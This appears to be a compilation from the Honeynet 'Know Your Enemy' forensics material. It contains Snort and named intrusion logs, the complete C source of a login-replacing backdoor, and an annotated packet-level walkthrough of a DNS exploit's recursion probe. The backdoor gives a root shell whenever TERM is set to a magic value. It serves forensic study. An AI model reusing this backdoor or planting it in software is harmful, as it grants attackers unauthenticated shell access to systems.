      Apr 25 02:38:17 mozart snort[5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
      Apr 25 08:02:41 mozart snort[5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
      Apr 25 08:02:41 mozart snort[5875]: IDS/DNS-version-query: 24.9.255.53:2991 -> 172.16.1.101:53
      Apr 25 19:37:32 mozart snort[5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
      Apr 26 05:45:12 mozart snort[6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
      Apr 26 06:43:05 mozart snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
      Apr 26 06:45:34 mozart snort[6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
      Apr 26 06:52:10 mozart snort[6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558
      Apr 26 10:39:12 mozart snort[621]: spp_portscan: PORTSCAN DETECTED from 204.72.244.72
      Apr 26 10:39:12 mozart snort[621]: IDS198/SYN FIN Scan: 204.72.244.72:53 -> 172.16.1.101:53
      Apr 26 10:39:12 mozart snort[621]: IDS198/SYN FIN Scan: 204.72.244.72:53 -> 172.16.1.107:53
      Apr 26 17:11:07 mozart snort[621]: IDS128/web-cgi-phf: 207.239.115.11:3536 -> 172.16.1.105:80
      Apr 26 17:11:17 mozart snort[621]: IDS/DNS-version-query: 207.239.115.11:4727 -> 172.16.1.105:53
      Apr 29 21:05:06 mozart snort[5358]: spp_portscan: PORTSCAN DETECTED from 212.109.2.136
      Apr 29 21:05:06 mozart snort[5358]: IDS198/SYN FIN Scan: 212.109.2.136:1080 -> 172.16.1.105:1080
      Apr 30 02:06:37 mozart snort[5750]: spp_portscan: PORTSCAN DETECTED from 202.185.32.60
      Apr 30 02:06:37 mozart snort[5750]: IDS198/SYN FIN Scan: 202.185.32.60:0 -> 172.16.1.101:143
      May 1 04:03:40 mozart snort[6038]: spp_portscan: PORTSCAN DETECTED from 63.203.1.60
      May 1 04:03:47 mozart snort[6038]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 63.203.1.60:3083
      May 1 04:03:47 mozart snort[6038]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 63.203.1.60:3215
      May 1 06:36:53 mozart snort[6038]: IDS212/dns-zone-transfer: 63.203.1.60:1089 -> 172.16.1.101:53
      May 2 16:28:05 mozart snort[6443]: IDS/DNS-version-query: 207.229.143.40:1708 -> 172.16.1.101:53
      May 2 16:28:40 mozart snort[6443]: IDS/DNS-version-query: 207.229.143.40:1715 -> 172.16.1.101:53
      May 2 17:01:43 mozart snort[6443]: IDS/DNS-version-query: 24.114.97.247:3429 -> 172.16.1.101:53
      May 3 19:17:53 mozart snort[6862]: spp_portscan: PORTSCAN DETECTED from 205.242.148.1
      May 3 19:17:53 mozart snort[6862]: IDS198/SYN FIN Scan: 205.242.148.1:0 -> 172.16.1.101:109
      May 3 20:34:15 mozart snort[6862]: IDS/RPC-rpcinfo-query: 200.241.69.1:3697 -> 172.16.1.101:111
      May 3 23:33:55 mozart snort[6862]: spp_portscan: PORTSCAN DETECTED from 210.97.123.3
      May 3 23:33:55 mozart snort[6862]: IDS198/SYN FIN Scan: 210.97.123.3:0 -> 172.16.1.105:109
      May 4 04:59:35 mozart snort[7541]: spp_portscan: PORTSCAN DETECTED from 205.242.148.1
      May 4 04:59:35 mozart snort[7541]: IDS198/SYN FIN Scan: 205.242.148.1:0 -> 172.16.1.101:109
      May 4 15:32:17 mozart snort[7541]: IDS/DNS-version-query: 63.224.195.25:2293 -> 172.16.1.101:53
      May 4 19:14:34 mozart snort[7541]: IDS/DNS-version-query: 12.10.173.249:3434 -> 172.16.1.101:53
      May 5 06:06:52 mozart snort[8324]: IDS212/dns-zone-transfer: 211.38.95.197:2262 -> 172.16.1.101:53
      May 5 08:35:48 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:953 -> 172.16.1.101:111
      May 5 08:35:49 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:955 -> 172.16.1.101:111
      May 5 08:35:53 mozart snort[8324]: IDS20/portmap-request-sadmind: 139.130.213.4:901 -> 172.16.1.101:111
      May 5 08:35:54 mozart snort[8324]: IDS247/large-udp: 139.130.213.4:902 -> 172.16.1.101:32773
      May 5 08:36:53 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:954 -> 172.16.1.101:111
      May 5 08:36:53 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:956 -> 172.16.1.101:111
      May 5 16:04:21 mozart snort[8324]: IDS/RPC-rpcinfo-query: 195.117.3.58:970 -> 172.16.1.101:111
      May 5 17:04:28 mozart snort[8324]: spp_portscan: PORTSCAN DETECTED from 212.109.2.136
      May 5 17:04:28 mozart snort[8324]: IDS198/SYN FIN Scan: 212.109.2.136:109 -> 172.16.1.107:109
      May 5 17:04:28 mozart snort[8324]: IDS198/SYN FIN Scan: 212.109.2.136:109 -> 172.16.1.101:109
      May 5 17:42:24 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:2277 -> 172.16.1.101:53
      May 5 17:46:28 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1831 -> 172.16.1.101:53
      May 5 17:52:58 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1482 -> 172.16.1.101:53
      May 5 17:58:16 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:3310 -> 172.16.1.101:53
      May 5 20:29:05 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1723 -> 172.16.1.101:53
      May 5 20:32:01 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:3132 -> 172.16.1.101:53
      May 6 08:54:09 victim1.honeynet.org named[4991]: unapproved AXFR from [212.72.63.240].4429 for UICMBA.edu (not master/slave)
      May 6 19:44:52 victim1.honeynet.org named[4991]: unapproved AXFR from [211.39.95.226].4958 for UICMBA.edu (not master/slave)
      May 7 19:22:22 victim1.honeynet.org named[4991]: unapproved AXFR from [216.190.204.3].1866 for UICMBA.edu (not master/slave)
      May 8 12:42:05 victim1.honeynet.org named[4991]: unapproved AXFR from [203.75.204.245].4542 for UICMBA.edu (not master/slave)
      May 8 21:53:03 lisa snort[387]: IDS118/Traceroute ICMP: 24.21.107.249 -> 172.16.1.104
      May 8 21:58:40 lisa snort[387]: IDS162/Ping Nmap 2.36BETA: 24.21.107.249 -> 172.16.1.104
      May 8 21:58:41 lisa snort[387]: spp_portscan: PORTSCAN DETECTED from 24.21.107.249
      May 8 21:59:06 lisa snort[387]: IDS162/Ping Nmap 2.36BETA: 24.21.107.249 -> 172.16.1.104
      May 8 22:16:06 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.81:34536 -> 172.16.1.104:33457
      May 8 22:16:45 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.80:34546 -> 172.16.1.104:33446
      May 8 22:17:35 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.81:34561 -> 172.16.1.104:33457
      May 9 08:02:54 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 216.61.43.89
      May 9 08:21:02 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 204.2.13.22
      May 9 09:39:28 lisa snort[2370]: IDS212/dns-zone-transfer: 206.133.123.19:2421 -> 172.16.1.101:53
      May 9 11:03:20 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2984 -> 172.16.1.107:27444
      May 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1025 -> 137.132.17.202:31335
      May 9 11:26:04 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2988 -> 172.16.1.107:27444
      May 9 11:26:04 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1027 -> 137.132.17.202:31335
      May 9 14:04:55 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 206.133.123.19
      May 9 14:04:57 lisa snort[2370]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 206.133.123.19:1720
      May 9 14:04:58 lisa snort[2370]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 206.133.123.19:1741
      May 9 14:05:08 lisa snort[2370]: IDS128/web-cgi-phf: 206.133.123.19:1815 -> 172.16.1.107:80
      May 9 14:05:09 lisa snort[2370]: IDS218/web-cgi-test-cgi: 206.133.123.19:1820 -> 172.16.1.107:80
      May 9 14:05:09 lisa snort[2370]: IDS235/web-cgi-handler: 206.133.123.19:1824 -> 172.16.1.107:80
      May 9 20:48:14 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:3076 -> 172.16.1.107:27444
      May 9 20:48:14 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1028 -> 137.132.17.202:31335
      
      EoF
      
      the backdoor code bj.c Know your enemy #3: Forensics
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      #define _XOPEN_SOURCE
      #include <unistd.h>
      #include <stdio.h>
      #include <signal.h>
      #include <sys/time.h>
      #include <string.h>
      #define SHELL "/bin/sh"
      #define SHELL_CALLME "login"
      #define LOGIN "/usr/bin/xstat"
      #define LOGIN_CALLME "login"
      #define ENV_NAME "TERM"
      #define ENV_VALUE "vt9111"
      #define ENV_FIX "r!!t!d"
      
      
      int owned(void);
      char **av, **ep;
      int main(int argc, char **argv, char **envp) {   
      av=argv;   
      ep=envp;   
      av[0]=SHELL_CALLME;           
      
              if (owned()) {   
                      char *sav[]={       SHELL_CALLME, NULL   };      
                      execve(SHELL, sav, ep);  
                      return 0;   
              }   
      
      execve(LOGIN, av, ep);   
      return 0;   
      
      }
      
      int owned(void) {   
      char *name, *value;   
      int i;   
      for (i=0; ep[i]!=NULL; ++i) {      
      name=strtok(ep[i], "=");      
      value=strtok(NULL, "=");      
      if (name==NULL || value==NULL) continue;      
              if (!strncmp(name, ENV_NAME, strlen(ENV_NAME))) {        
                      if (!strncmp(value, ENV_VALUE, strlen(ENV_VALUE))) {        
                              char tmp[100];  
                              sprintf(tmp, "%s=%s", ENV_NAME, ENV_FIX);       
                              ep[i]=strdup(tmp);          
                              return 1;        
                      }      
              }   
      }   
      
      
      return 0;
      }      
      
      
      EoF
      
      detailed forensic analysis of an attack Know your enemy #3 : Forensics
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
        
      --- COMMENT: The Tickle --- 
      
      What you are looking at below are the decoded packets of the exploit.  For this particular DNS exploit to work, the DNS victim must be recursive (as I soon learned).  So, our black-hat has to
      determine that our victim DNS server is recursive.  He first tests this by querying the DNS server to resolve 107.71.80.216.in-addr.arpa.  If successful, he will then know our DNS server is
      recursive. Below you see the packets of the successfull, recursive lookup of 107.71.80.216.in-addr.arpa. 
      
      04/26-06:42:59.473423 213.28.22.189:1045 -> 172.16.1.107:53 
      UDP TTL:40 TOS:0x0 ID:18856 
      Len: 52 
      95 6A 01 00 00 01 00 00 00 00 00 00 03 31 30 37  .j...........107 
      02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad 
      64 72 04 61 72 70 61 00 00 0C 00 01              dr.arpa..... 
      
      04/26-06:42:59.474405 172.16.1.107:1028 -> 128.8.10.90:53 
      UDP TTL:64 TOS:0x0 ID:18861 
      Len: 52 
      5C 21 01 00 00 01 00 00 00 00 00 00 03 31 30 37  \!...........107 
      02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad 
      64 72 04 61 72 70 61 00 00 0C 00 01              dr.arpa..... 
      
      04/26-06:42:59.574808 128.8.10.90:53 -> 172.16.1.107:1028 
      UDP TTL:48 TOS:0x0 ID:5077 
      Len: 135 
      5C 21 81 00 00 01 00 00 00 02 00 00 03 31 30 37  \!...........107 
      02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad 
      64 72 04 61 72 70 61 00 00 0C 00 01 02 37 31 02  dr.arpa......71. 
      38 30 03 32 31 36 07 49 4E 2D 41 44 44 52 04 61  80.216.IN-ADDR.a 
      72 70 61 00 00 02 00 01 00 07 E9 00 00 12 03 4E  rpa............N 
      53 30 08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00  S0.ENTERACT.COM. 
      C0 2C 00 02 00 01 00 07 E9 00 00 13 07 42 49 46  .,...........BIF 
      52 4F 53 54 08 53 45 41 53 54 52 4F 4D C0 5B     ROST.SEASTROM.[ 
      
      04/26-06:42:59.576169 172.16.1.107:1028 -> 198.32.64.12:53 
      UDP TTL:64 TOS:0x0 ID:18862 
      Len: 46 
      87 2A 00 00 00 01 00 00 00 00 00 00 07 42 49 46  .*...........BIF 
      52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F  ROST.SEASTROM.CO 
      4D 00 00 01 00 01                                M..... 
      
      04/26-06:42:59.576953 172.16.1.107:1028 -> 198.32.64.12:53 
      UDP TTL:64 TOS:0x0 ID:18863 
      Len: 42 
      DA 57 00 00 00 01 00 00 00 00 00 00 03 4E 53 30  .W...........NS0 
      08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01  .ENTERACT.COM... 
      00 01                                            .. 
      
      04/26-06:43:00.215765 198.32.64.12:53 -> 172.16.1.107:1028 
      UDP TTL:51 TOS:0x0 ID:42900 
      Len: 462 
      87 2A 80 00 00 01 00 00 00 0C 00 0C 07 42 49 46  .*...........BIF 
      52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F  ROST.SEASTROM.CO 
      4D 00 00 01 00 01 03 43 4F 4D 00 00 02 00 01 00  M......COM...... 
      07 E9 00 00 14 01 41 0C 52 4F 4F 54 2D 53 45 52  ......A.ROOT-SER 
      56 45 52 53 03 4E 45 54 00 C0 26 00 02 00 01 00  VERS.NET..&..... 
      07 E9 00 00 04 01 47 C0 37 C0 26 00 02 00 01 00  ......G.7.&..... 
      07 E9 00 00 11 01 46 0C 47 54 4C 44 2D 53 45 52  ......F.GTLD-SER 
      56 45 52 53 C0 44 C0 26 00 02 00 01 00 07 E9 00  VERS.D.&........ 
      00 04 01 46 C0 37 C0 26 00 02 00 01 00 07 E9 00  ...F.7.&........ 
      00 04 01 49 C0 37 C0 26 00 02 00 01 00 07 E9 00  ...I.7.&........ 
      00 04 01 45 C0 37 C0 26 00 02 00 01 00 07 E9 00  ...E.7.&........ 
      00 04 01 4A C0 67 C0 26 00 02 00 01 00 07 E9 00  ...J.g.&........ 
      00 04 01 4B C0 67 C0 26 00 02 00 01 00 07 E9 00  ...K.g.&........ 
      00 04 01 41 C0 67 C0 26 00 02 00 01 00 07 E9 00  ...A.g.&........ 
      00 04 01 4D C0 67 C0 26 00 02 00 01 00 07 E9 00  ...M.g.&........ 
      00 04 01 48 C0 67 C0 26 00 02 00 01 00 07 E9 00  ...H.g.&........ 
      00 04 01 43 C0 67 C0 35 00 01 00 01 00 36 EE 80  ...C.g.5.....6.. 
      00 04 C6 29 00 04 C0 55 00 01 00 01 00 36 EE 80  ...)...U.....6.. 
      00 04 C0 70 24 04 C0 65 00 01 00 01 00 07 E9 00  ...p$..e........ 
      00 04 C6 11 D0 43 C0 82 00 01 00 01 00 36 EE 80  .....C.......6.. 
      00 04 C0 05 05 F1 C0 92 00 01 00 01 00 36 EE 80  .............6.. 
      00 04 C0 24 94 11 C0 A2 00 01 00 01 00 36 EE 80  ...$.........6.. 
      00 04 C0 CB E6 0A C0 B2 00 01 00 01 00 07 E9 00  ................ 
      00 04 C6 29 00 15 C0 C2 00 01 00 01 00 07 E9 00  ...)............ 
      00 04 C3 08 63 0B C0 D2 00 01 00 01 00 07 E9 00  ....c........... 
      00 04 C6 29 03 26 C0 E2 00 01 00 01 00 07 E9 00  ...).&.......... 
      00 04 D2 B0 98 12 C0 F2 00 01 00 01 00 07 E9 00  ................ 
      00 04 D8 21 4B 52 C1 02 00 01 00 01 00 07 E9 00  ...!KR.......... 
      00 04 CD BC B9 12                                ...... 
      
      04/26-06:43:00.218808 172.16.1.107:1028 -> 205.188.185.18:53 
      UDP TTL:64 TOS:0x0 ID:18864 
      Len: 46 
      E6 38 00 00 00 01 00 00 00 00 00 00 07 42 49 46  .8...........BIF 
      52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F  ROST.SEASTROM.CO 
      4D 00 00 01 00 01                                M..... 
      
      04/26-06:43:00.220217 198.32.64.12:53 -> 172.16.1.107:1028 
      UDP TTL:51 TOS:0x0 ID:42903 
      Len: 458 
      DA 57 80 00 00 01 00 00 00 0C 00 0C 03 4E 53 30  .W...........NS0 
      08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01  .ENTERACT.COM... 
      00 01 03 43 4F 4D 00 00 02 00 01 00 07 E9 00 00  ...COM.......... 
      14 01 41 0C 52 4F 4F 54 2D 53 45 52 56 45 52 53  ..A.ROOT-SERVERS 
      03 4E 45 54 00 C0 22 00 02 00 01 00 07 E9 00 00  .NET.."......... 
      04 01 47 C0 33 C0 22 00 02 00 01 00 07 E9 00 00  ..G.3."......... 
      11 01 46 0C 47 54 4C 44 2D 53 45 52 56 45 52 53  ..F.GTLD-SERVERS 
      C0 40 C0 22 00 02 00 01 00 07 E9 00 00 04 01 46  .@."...........F 
      C0 33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 49  .3."...........I 
      C0 33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 45  .3."...........E 
      C0 33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4A  .3."...........J 
      C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4B  .c."...........K 
      C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 41  .c."...........A 
      C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4D  .c."...........M 
      C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 48  .c."...........H 
      C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 43  .c."...........C 
      C0 63 C0 31 00 01 00 01 00 36 EE 80 00 04 C6 29  .c.1.....6.....) 
      00 04 C0 51 00 01 00 01 00 36 EE 80 00 04 C0 70  ...Q.....6.....p 
      24 04 C0 61 00 01 00 01 00 07 E9 00 00 04 C6 11  $..a............ 
      D0 43 C0 7E 00 01 00 01 00 36 EE 80 00 04 C0 05  .C.~.....6...... 
      05 F1 C0 8E 00 01 00 01 00 36 EE 80 00 04 C0 24  .........6.....$ 
      94 11 C0 9E 00 01 00 01 00 36 EE 80 00 04 C0 CB  .........6...... 
      E6 0A C0 AE 00 01 00 01 00 07 E9 00 00 04 C6 29  ...............) 
      00 15 C0 BE 00 01 00 01 00 07 E9 00 00 04 C3 08  ................ 
      63 0B C0 CE 00 01 00 01 00 07 E9 00 00 04 C6 29  c..............) 
      03 26 C0 DE 00 01 00 01 00 07 E9 00 00 04 D2 B0  .&.............. 
      98 12 C0 EE 00 01 00 01 00 07 E9 00 00 04 D8 21  ...............! 
      4B 52 C0 FE 00 01 00 01 00 07 E9 00 00 04 CD BC  KR.............. 
      B9 12                                            .. 
      
      04/26-06:43:00.222098 172.16.1.107:1028 -> 205.188.185.18:53 
      UDP TTL:64 TOS:0x0 ID:18865 
      Len: 42 
      3D 9D 00 00 00 01 00 00 00 00 00 00 03 4E 53 30  =............NS0 
      08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01  .ENTERACT.COM... 
      00 01                                            .. 
      
      04/26-06:43:00.315827 205.188.185.18:53 -> 172.16.1.107:1028 
      UDP TTL:240 TOS:0x0 ID:40907  DF 
      Len: 147 
      E6 38 80 00 00 01 00 01 00 02 00 02 07 42 49 46  .8...........BIF 
      52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F  ROST.SEASTROM.CO 
      4D 00 00 01 00 01 C0 0C 00 01 00 01 00 02 A3 00  M............... 
      00 04 C0 94 FC 0A 08 53 45 41 53 54 52 4F 4D 03  .......SEASTROM. 
      63 6F 6D 00 00 02 00 01 00 02 A3 00 00 02 C0 0C  com............. 
      C0 36 00 02 00 01 00 02 A3 00 00 0F 03 4E 53 30  .6...........NS0 
      08 45 4E 54 45 52 41 43 54 C0 3F C0 0C 00 01 00  .ENTERACT.?..... 
      01 00 02 A3 00 00 04 C0 94 FC 0A C0 5C 00 01 00  ............\... 
      01 00 02 A3 00 00 04 CF E5 8F 03                 ........... 
      
      04/26-06:43:00.317904 205.188.185.18:53 -> 172.16.1.107:1028 
      UDP TTL:240 TOS:0x0 ID:40908  DF 
      Len: 147 
      3D 9D 80 00 00 01 00 01 00 02 00 02 03 4E 53 30  =............NS0 
      08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01  .ENTERACT.COM... 
      00 01 C0 0C 00 01 00 01 00 02 A3 00 00 04 CF E5  ................ 
      8F 03 08 45 4E 54 45 52 41 43 54 03 63 6F 6D 00  ...ENTERACT.com. 
      00 02 00 01 00 02 A3 00 00 13 07 42 49 46 52 4F  ...........BIFRO 
      53 54 08 53 45 41 53 54 52 4F 4D C0 3B C0 32 00  ST.SEASTROM.;.2. 
      02 00 01 00 02 A3 00 00 02 C0 0C C0 4A 00 01 00  ............J... 
      01 00 02 A3 00 00 04 C0 94 FC 0A C0 0C 00 01 00  ................ 
      01 00 02 A3 00 00 04 CF E5 8F 03                 ........... 
      
      04/26-06:43:04.462930 213.28.22.189:1045 -> 172.16.1.107:53 
      UDP TTL:40 TOS:0x0 ID:18880 
      Len: 52 
      95 6A 01 00 00 01 00 00 00 00 00 00 03 31 30 37  .j...........107 
      02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad 
      64 72 04 61 72 70 61 00 00 0C 00 01              dr.arpa..... 
      
      04/26-06:43:04.463599 172.16.1.107:1028 -> 192.148.252.10:53 
      UDP TTL:64 TOS:0x0 ID:18866 
      Len: 52 
      F1 8E 01 00 00 01 00 00 00 00 00 00 03 31 30 37  .............107 
      02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad 
      64 72 04 61 72 70 61 00 00 0C 00 01              dr.arpa..... 
      
      04/26-06:43:04.559157 192.148.252.10:53 -> 172.16.1.107:1028 
      UDP TTL:54 TOS:0x0 ID:7629 
      Len: 196 
      F1 8E 85 80 00 01 00 01 00 02 00 02 03 31 30 37  .............107 
      02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad 
      64 72 04 61 72 70 61 00 00 0C 00 01 C0 0C 00 0C  dr.arpa......... 
      00 01 00 01 51 80 00 1D 02 31 31 06 6C 73 70 69  ....Q....11.lspi 
      74 7A 04 73 6F 68 6F 08 65 6E 74 65 72 61 63 74  tz.soho.enteract 
      03 63 6F 6D 00 02 37 31 02 38 30 03 32 31 36 07  .com..71.80.216. 
      49 4E 2D 41 44 44 52 04 41 52 50 41 00 00 02 00  IN-ADDR.ARPA.... 
      01 00 01 51 80 00 06 03 6E 73 30 C0 47 C0 55 00  ...Q....ns0.G.U. 
      02 00 01 00 01 51 80 00 13 07 62 69 66 72 6F 73  .....Q....bifros 
      74 08 73 65 61 73 74 72 6F 6D C0 50 C0 77 00 01  t.seastrom.P.w.. 
      00 01 00 00 0E 10 00 04 CF E5 8F 03 C0 89 00 01  ................ 
      00 01 00 00 0E 10 00 04 C0 94 FC 0A              ............ 
      
      04/26-06:43:04.560130 172.16.1.107:53 -> 213.28.22.189:1045 
      UDP TTL:64 TOS:0x0 ID:18867 
      Len: 196 
      95 6A 85 80 00 01 00 01 00 02 00 02 03 31 30 37  .j...........107 
      02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64  .71.80.216.in-ad 
      64 72 04 61 72 70 61 00 00 0C 00 01 C0 0C 00 0C  dr.arpa......... 
      00 01 00 01 51 80 00 1D 02 31 31 06 6C 73 70 69  ....Q....11.lspi 
      74 7A 04 73 6F 68 6F 08 65 6E 74 65 72 61 63 74  tz.soho.enteract 
      03 63 6F 6D 00 02 37 31 02 38 30 03 32 31 36 07  .com..71.80.216. 
      49 4E 2D 41 44 44 52 04 41 52 50 41 00 00 02 00  IN-ADDR.ARPA.... 
      01 00 01 51 80 00 06 03 6E 73 30 C0 47 C0 55 00  ...Q....ns0.G.U. 
      02 00 01 00 01 51 80 00 13 07 62 69 66 72 6F 73  .....Q....bifros 
      74 08 73 65 61 73 74 72 6F 6D C0 50 C0 77 00 01  t.seastrom.P.w.. 
      00 01 00 00 0E 10 00 04 CF E5 8F 03 C0 89 00 01  ................ 
      00 01 00 00 0E 10 00 04 C0 94 FC 0A              ............ 
      
                  ---- COMMENT: Tickle Worked ---- 
      
      The recursvie lookup worked.  Not only is  our system running a vulnerable version of named, but it is recuresive.  The black-hat now queries our DNS server for the name r.rsavings.net.  This is
      extrmelly odd, why would a remote system query my DNS server for a different domain name?  As we will soon learn, this is how the exploit works.  Our DNS server is being suckered.  Read below as
      our DNS server recursively attempts to find the NS for savings.net so it can query the IP Address (A record) of r.rsavings.net. 
      
      04/26-06:43:04.883506 213.28.22.189:1045 -> 172.16.1.107:53 
      UDP TTL:40 TOS:0x0 ID:18882 
      Len: 40 
      95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r 
      73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net..... 
      
      04/26-06:43:04.884189 172.16.1.107:1028 -> 198.41.0.21:53 
      UDP TTL:64 TOS:0x0 ID:18868 
      Len: 40 
      F7 F5 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .............r.r 
      73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net..... 
      
      04/26-06:43:04.969435 198.41.0.21:53 -> 172.16.1.107:1028 
      UDP TTL:244 TOS:0x0 ID:56421  DF 
      Len: 202 
      F7 F5 81 00 00 01 00 00 00 04 00 04 01 72 08 72  .............r.r 
      73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net..... 
      08 52 53 41 56 49 4E 47 53 03 4E 45 54 00 00 02  .RSAVINGS.NET... 
      00 01 00 02 A3 00 00 12 03 4E 53 33 08 4D 59 44  .........NS3.MYD 
      4F 4D 41 49 4E 03 43 4F 4D 00 C0 20 00 02 00 01  OMAIN.COM.. .... 
      00 02 A3 00 00 06 03 4E 53 34 C0 3C C0 20 00 02  .......NS4.<. .. 
      00 01 00 02 A3 00 00 06 03 57 57 57 C0 20 C0 20  .........WWW. . 
      00 02 00 01 00 02 A3 00 00 08 05 53 45 52 56 32  ...........SERV2 
      C0 20 C0 38 00 01 00 01 00 02 A3 00 00 04 D8 22  . .8..........." 
      59 03 C0 56 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..V..........." 
      59 04 C0 68 00 01 00 01 00 02 A3 00 00 04 3F E2  Y..h..........?. 
      51 0D C0 7A 00 01 00 01 00 02 A3 00 00 04 3F E2  Q..z..........?. 
      51 0C                                            Q. 
      
      04/26-06:43:04.970963 172.16.1.107:1028 -> 198.41.3.38:53 
      UDP TTL:64 TOS:0x0 ID:18869 
      Len: 42 
      C2 4E 00 00 00 01 00 00 00 00 00 00 03 4E 53 34  .N...........NS4 
      08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01  .MYDOMAIN.COM... 
      00 01                                            .. 
      
      04/26-06:43:04.971751 172.16.1.107:1028 -> 198.41.3.38:53 
      UDP TTL:64 TOS:0x0 ID:18870 
      Len: 42 
      F2 0B 00 00 00 01 00 00 00 00 00 00 03 4E 53 33  .............NS3 
      08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01  .MYDOMAIN.COM... 
      00 01                                            .. 
      
      04/26-06:43:04.972052 172.16.1.107:1028 -> 63.226.81.13:53 
      UDP TTL:64 TOS:0x0 ID:18871 
      Len: 40 
      0C BC 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .............r.r 
      73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net..... 
      
      04/26-06:43:05.063551 198.41.3.38:53 -> 172.16.1.107:1028 
      UDP TTL:242 TOS:0x0 ID:42903  DF 
      Len: 202 
      C2 4E 80 00 00 01 00 01 00 04 00 04 03 4E 53 34  .N...........NS4 
      08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00 00 01  .MYDOMAIN.COM... 
      00 01 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22  ..............." 
      59 04 08 4D 59 44 4F 4D 41 49 4E 03 43 4F 4D 00  Y..MYDOMAIN.COM. 
      00 02 00 01 00 02 A3 00 00 06 03 4E 53 31 C0 32  ...........NS1.2 
      C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E 53 32  .2...........NS2 
      C0 32 C0 32 00 02 00 01 00 02 A3 00 00 06 03 4E  .2.2...........N 
      53 33 C0 32 C0 32 00 02 00 01 00 02 A3 00 00 02  S3.2.2.......... 
      C0 0C C0 4A 00 01 00 01 00 02 A3 00 00 04 D8 22  ...J..........." 
      59 01 C0 5C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..\..........." 
      59 02 C0 6E 00 01 00 01 00 02 A3 00 00 04 D8 22  Y..n..........." 
      59 03 C0 0C 00 01 00 01 00 02 A3 00 00 04 D8 22  Y.............." 
      59 04                                            Y. 
      
      04/26-06:43:05.065790 198.41.3.38:53 -> 172.16.1.107:1028 
      UDP TTL:242 TOS:0x0 ID:42904  DF 
      Len: 202 
      F2 0B 80 00 00 01 00 01 00 04 00 04 03 4E 53 33  .............NS3 
